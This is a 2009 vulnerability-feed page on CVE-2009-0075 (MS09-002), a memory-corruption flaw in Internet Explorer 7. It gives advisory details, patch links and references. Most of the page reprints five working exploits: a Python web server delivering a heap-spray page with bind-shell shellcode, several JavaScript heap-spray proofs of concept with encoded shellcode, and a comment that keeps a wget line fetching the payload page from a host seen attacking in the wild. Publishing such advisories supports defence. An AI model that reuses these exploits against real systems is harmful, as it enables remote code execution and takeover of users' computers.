|
Feeds -
Exploits
|
|
Written by TippingPoint and the Zero Day Initiative
|
|
Friday, 20 February 2009 20:29 |
Microsoft Internet Explorer Uninitialized Memory Remote Code Execution Vulnerability
-\\Bugtraq ID:
33627
-\\Class:
Failure to Handle Exceptional Conditions
-\\CVE:
CVE-2009-0075
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Feb 10 2009 12:00AM
-\\Updated:
Feb 20 2009 04:27PM
-\\Credit:
TippingPoint and the Zero Day Initiative
-\\Vulnerable:
Nortel Networks Self-Service Speech Server 0
Nortel Networks Self-Service Peri Workstation 0
Nortel Networks Self-Service Peri Application 0
Nortel Networks Self-Service MPS 500 0
Nortel Networks Self-Service MPS 1000 0
Nortel Networks Self-Service MPS 100 0
Nortel Networks Multimedia Comm Mas 0
Nortel Networks Enterprise VoIP TM-CS1000
Microsoft Internet Explorer 7.0
+ Microsoft Windows Vista Ultimate
+ Microsoft Windows Vista Ultimate
+ Microsoft Windows Vista Ultimate
+ Microsoft Windows Vista Home Premium
+ Microsoft Windows Vista Home Premium
+ Microsoft Windows Vista Home Premium
+ Microsoft Windows Vista Home Premium
+ Microsoft Windows Vista Home Premium
+ Microsoft Windows Vista Home Basic
+ Microsoft Windows Vista Home Basic
+ Microsoft Windows Vista Home Basic
+ Microsoft Windows Vista Home Basic
+ Microsoft Windows Vista Home Basic
+ Microsoft Windows Vista Enterprise
+ Microsoft Windows Vista Enterprise
+ Microsoft Windows Vista Enterprise
+ Microsoft Windows Vista Enterprise
+ Microsoft Windows Vista Enterprise
+ Microsoft Windows Vista Business
+ Microsoft Windows Vista Business
+ Microsoft Windows Vista Business
+ Microsoft Windows Vista Business
+ Microsoft Windows Vista Business
+ Microsoft Windows Vista 0
+ Microsoft Windows Vista 0
+ Microsoft Windows Vista 0
+ Microsoft Windows Vista 0
+ Microsoft Windows Vista 0
-\\Discussion
Microsoft Internet Explorer is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the underlying computer. Failed attacks will cause denial-of-service conditions.
-\\Exploit(s)/PoC(s):
The issue is being exploited in the wild, in targeted attacks.
The following commercial exploit is available through Immunity CANVAS:
https://www.immunityinc.com/downloads/immpartners/ceu_ms09_002.tar.gz
A working commercial exploit is available through VUPEN Security - Exploit and PoCs Service. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following exploit and proof-of-concept code are available:
===============================================================
33627-SecureState.py
^^^^^^^^^^^^^^^^^^^^^
#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) #
###############################################################################
# #
# Thanks to str0ke for finding this in the wild. #
# #
# Tested on Windows 2003 SP2 R2 #
# #
# Written by SecureState R&D Team (ReL1K) #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
###############################################################################
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys
try:
import psyco
psyco.full()
except ImportError:
pass
class myRequestHandler(BaseHTTPRequestHandler):
try:
def do_GET(self):
# Always Accept GET
self.printCustomHTTPResponse(200)
# Site root: Main Menu
if self.path == "/":
target=self.client_address[0]
self.wfile.write("""<html><head>""")
self.wfile.write("""<div id="replace">x</div>
<script language="JavaScript">
// win32_bind - EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai http://metasploit.com */
var c = unescape("%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e%u7831%u8317%u04c0%u7a03%u8e32%u867b%ua55e%u9ec9%uc666%ua12d%ub2f9%u79be%u4fde%ubd7b%u2c95%uc581%u23a8%u7a02%u30b3%ua44a%uadc2%u2f3c%ubaf0%uc1be%u7cc8%ub159%ubdaf%uce2e%uf76e%ud1c2%ue3b2%uea29%ud066%u79f9%u9362%ua5a5%u4f6d%u2e3f%uc461%u6f4b%udb66%u8ca0%u50ba%ufebf%u7ae6%u3da1%u59d7%u4a45%u6e5b%u0c0d%u0550%u9061%u92c5%ua0c2%ucd4b%ufe4c%ue17d%u0101%u9f57%u9bf2%u5330%u0bc7%ue0b6%u9415%uf86c%u428a%ueb46%ua9d7%u0b08%u92f1%u1621%uad98%ud1df%uf867%ue075%ud298%u3de2%u276f%uea5f%u118f%u46f3%uce23%u2ba7%ub390%u5314%u55c6%ubef3%uff9b%u4850%u6a82%uee3e%ue45f%ub978%ud2a0%u56ed%u8f0e%u860e%u8bd8%u095c%u84f0%u8061%u7f51%ufd61%u9a3e%u78d4%u33f7%u5218%uef58%u0eb2%udfa6%ud9a8%ua6bf%u6008%ua717%uc643%u8768%u830a%u41f2%u30bb%u0496%uddde%u4f38%uee08%u8830%uaa20%ub4cb%uf284%u923f%ub019%u1c92%u19a7%u6d7e%u5a52%uc62b%uf208%ue659%u15fc%u6361%ue547%ud04b%u4b10%ub725%u01cf%u66c4%u80a1%u7797%u4391%u5eb5%u5a17%u9f96%u08ce%ua0e6%u33d8%ud5c8%u3070%u2d6a%u371a%uffbb%u171c%u0f2c%u9c68%ubcf2%u4b92%u92f3");
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>""")
self.wfile.write("""<title>Microsoft Internet Explorer MS09-002 Buffer Overflow</title></head><body>""")
self.wfile.write("""<left><body bgcolor="Black"><font color="White"><p>Exploit is running...</p><br>""")
print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-]NetCat to IP Address: %s and port 5500 [-]" % (target))
#print ("[-] Example: open up a command shell and type 'nc %s 5500' [-]" % (target))
# Print custom HTTP Response
def printCustomHTTPResponse(self, respcode):
self.send_response(respcode)
self.send_header("Content-type", "text/html")
self.send_header("Server", "myRequestHandler")
self.end_headers()
# In case of exceptions, pass them
except Exception:
pass
httpd = HTTPServer(('', 80), myRequestHandler)
print ("""
###############################################################################
MS Internet Explorer 7 Memory Corruption Exploit (MS09-002)
###############################################################################
# #
# Thanks to Str0ke for finding this in the wild. #
# #
# Tested on Windows 2003 SP2 R2 #
# #
# Written by SecureState R&D Team #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
###############################################################################
""")
print ("[-] Starting MS Internet Explorer 7 Memory Corruption Exploit:80 [-]")
print ("[-] Have someone connect to you on port 80 [-]")
print ("Type <control>-c to exit..")
try:
# handle the connections
httpd.handle_request()
# Serve HTTP server forever
httpd.serve_forever()
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
print ("\n\nExiting exploit...\n\n")
sys.exit()
============================
33627-webDEViL.js
^^^^^^^^^^^^^^^^^
<!-- Calculator should spawn. changed the block size. tested on 2003 Server SP2. webDEViL -->
<script language="JavaScript">
var c=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var array = new Array();
var ls = 0xd00000;
var b = unescape("%u0c0c%u0c0c");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u9090%u9090AAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
============================
33627.js
^^^^^^^^
<!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"
took a little but found it. /str0ke
-->
<script language="JavaScript">
var c="putyourshizhere-unescaped";
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
============================
33627-friddy.js
^^^^^^^^^^^^^^^
<script language="JavaScript">
<!--
MS09-002 Internet Exploere 7.0 Exploit
Modify by Friddy 2009.02.12 mail:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
blog:www.friddy.cn
Tested under Windows XP sp2+IE 7.0
shellcode will popup the calc.exe
-->
var shellcode=unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var array = new Array();
var ls = 0x100000-(shellcode.length*2+0x01020);
var b = unescape("%u0D0D%u0D0D");
while(b.length<ls) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xD0; i++) {
array[i] = lh + shellcode;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
</script>
============================
33627-Abyssec.js
^^^^^^^^^^^^^^^^
<!--
Internet Explorer 7 Uninitialized Memory Corruption Exploit
http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx
Abyssec Inc Public Exploits 2009/2/18
this Exploit is based on N/A PoC in Milw0rm but The PoC was really simple to
exploit this PoC can be exploit on DEP-Enabled System As well using .Net
Shellcode trick or etc mayve i write Dep-Enabled version too And also
i should notice , this code can modify to be more reliable ..
Feel free to visit us at : www.Abyssec.com
to contact me directly use :
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
Note : Tested and Worked On XP SP2 please wait for another version
-->
<script language="JavaScript">
// Skyland win32 bindshell (28876/tcp) shellcode
// If you want an evill Shellcode go ahead !!!
var shellcode=unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
var array = new Array();
//Don't need change but for execute time you can change ;)
var calc = 0x100000-(shellcode.length*2+0x01020);
// Spray or Not :-??
var point = unescape("%u0D0D%u0D0D");
while(point.length<calc) { point+=point;}
var sec = point.substring(0,calc/2);
delete point;
for(i=0; i<0xD0; i++) {
array[i] = sec + shellcode;
}
// N/A Code
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
</script>
-\\Solution
The vendor released an advisory along with fixes to address this issue. Please see the references for more information.
Microsoft Internet Explorer 7.0
--Microsoft Cumulative Security Update for Internet Explorer 7 for Windows Server 2003 (KB961260)
http://www.microsoft.com/downloads/details.aspx?familyid=e52aa1fd-e694-4322-b3ff-6abc1b4a16fhttp://www.microsoft.com/downloads/details.aspx?familyid=e52aa1fd-e694-4322-b3ff-6abc1b4a16fe
--Microsoft Cumulative Security Update for Internet Explorer 7 for Windows Server 2003 64-bit Itanium Edition (K
http://www.microsoft.com/downloads/details.aspx?familyid=5ce78797-d1c0-40d4-84e1-1004389833bhttp://www.microsoft.com/downloads/details.aspx?familyid=5ce78797-d1c0-40d4-84e1-1004389833be
--Microsoft Cumulative Security Update for Internet Explorer 7 for Windows Server 2003 x64 Edition (KB961260)
http://www.microsoft.com/downloads/details.aspx?familyid=edbf1566-b96b-4c7d-98fe-b15f8e76679http://www.microsoft.com/downloads/details.aspx?familyid=edbf1566-b96b-4c7d-98fe-b15f8e766792
--Microsoft Cumulative Security Update for Internet Explorer 7 for Windows XP (KB961260)
http://www.microsoft.com/downloads/details.aspx?familyid=8cd902ec-e018-4b61-80f9-825d973f998http://www.microsoft.com/downloads/details.aspx?familyid=8cd902ec-e018-4b61-80f9-825d973f998e
--Microsoft Cumulative Security Update for Internet Explorer 7 for Windows XP x64 Edition (KB961260)
http://www.microsoft.com/downloads/details.aspx?familyid=dd3e2236-9cc0-478e-a46c-981ef685c0ehttp://www.microsoft.com/downloads/details.aspx?familyid=dd3e2236-9cc0-478e-a46c-981ef685c0e3
--Microsoft Cumulative Security Update for Internet Explorer 7 in Windows Server 2008 (KB961260)
http://www.microsoft.com/downloads/details.aspx?familyid=2491dbf2-7cd3-44f1-bfad-77e6f760a25http://www.microsoft.com/downloads/details.aspx?familyid=2491dbf2-7cd3-44f1-bfad-77e6f760a25c
--Microsoft Cumulative Security Update for Internet Explorer 7 in Windows Server 2008 x64 Edition (KB961260)
http://www.microsoft.com/downloads/details.aspx?familyid=794373cc-2dce-4ef5-af50-7804c622c23http://www.microsoft.com/downloads/details.aspx?familyid=794373cc-2dce-4ef5-af50-7804c622c230
--Microsoft Cumulative Security Update for Internet Explorer 7 in Windows Vista (KB961260)
http://www.microsoft.com/downloads/details.aspx?familyid=5f9fa4b6-85a4-43bc-b84f-6bd84779965http://www.microsoft.com/downloads/details.aspx?familyid=5f9fa4b6-85a4-43bc-b84f-6bd847799650
--Microsoft Cumulative Security Update for Internet Explorer 7 in Windows Vista x64 Edition (KB961260)
http://www.microsoft.com/downloads/details.aspx?familyid=e9a8c94b-b9d2-4d64-855f-b5f02ce3dfbhttp://www.microsoft.com/downloads/details.aspx?familyid=e9a8c94b-b9d2-4d64-855f-b5f02ce3dfb5
--Microsoft Cumulative Security Update for Internet Explorer in Windows Server 2008 64-bit Itanium Edition (KB96
http://www.microsoft.com/downloads/details.aspx?familyid=11985325-4b33-4077-82cf-6afc7a71c51http://www.microsoft.com/downloads/details.aspx?familyid=11985325-4b33-4077-82cf-6afc7a71c510
-\\Reference(s)
--Microsoft Internet Explorer Homepage
http://www.microsoft.com/ie (Microsoft)
--ZDI-09-011: Microsoft Internet Explorer CFunctionPointer Memory Corruption Vulne
http://www.securityfocus.com/archive/1/50083 (ZDI Disclosures <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--2009009324: Nortel Response to Microsoft Security Bulletin MS09-002
http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&DocumentOID=835004&poi (Nortel Networks)
--Microsoft Internet Explorer CFunctionPointer Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-011 (Zero Day Initiative)
--Microsoft Security Bulletin MS09-002
http://www.microsoft.com/technet/security/Bulletin/MS09-002.msp (Microsoft)
|
